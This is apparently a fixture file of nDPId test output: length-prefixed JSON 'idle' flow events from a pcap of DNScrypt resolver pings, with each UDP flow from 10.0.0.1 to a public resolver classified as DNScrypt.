+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337218,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396107,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337186,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317825,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337190,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312466,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380838,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":56035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380832,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":33071,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 